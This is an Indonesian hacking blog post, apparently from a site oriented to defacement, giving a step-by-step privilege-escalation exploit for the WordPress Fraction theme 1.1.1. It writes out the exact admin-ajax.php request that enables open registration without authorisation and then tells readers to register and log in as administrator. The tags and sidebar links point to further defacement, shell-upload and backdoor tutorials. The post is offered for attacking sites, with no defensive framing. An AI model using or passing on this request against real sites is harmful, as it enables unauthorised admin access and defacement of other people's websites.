• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

WordPress Fraction Theme Version 1.1.1 Privilege Escalation

March 11, 2015 by Jack Wilder Leave a Comment

Exploit nya masih anget kak :p . Baru kemaren dirilis di 1337day. Oke langsung saja ya alat dan bahat nya :3
Google Dorks :
USE YOUR BRAIN, BITCH !!

Vulnerability : /fraction-theme/functions/ajax.php

How to Exploit :
localhost/wordpress/wp-admin/admin-ajax.php?action=ot_save_options&users_can_register=1
Jika fitur register sebelumnya dilarang, dengan command ini maka fitur register akan dibuka secara ilegal.

Habis itu, buka localhost/wordpress/wp-login.php?action=register

Cek email, masukin user dan password, logged to dashboard as Admin 🙂

Sekian tutor kali ini semoga bermanfaat.

Shares

Filed Under: WordPress Exploit Tagged With: Deface, Exploit, Hacking

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

RCE pada Redis via Master-Slave Replication

Laravel PHPUnit Remote Code Execution

FCKeditor Bypass Shell Upload With Burp Suite Intercept

Hack Targeted Website using Reverse IP

Tumblr Custom Domain or Subdomain Takeover

Heroku Custom Domain or Subdomain Takeover

Deface WordPress dengan Exploit Themes Qualifire File Upload Vulnerability

Upload Backdoor Lewat MySQL Database (phpMyAdmin)

Cara Mendapatkan RDP Gratis Dengan Shell Windows

Tutorial Deface – Menutup Halaman Depan Situs Target dengan JS Overlay

LinuxSec / 84 queries in 0.21 seconds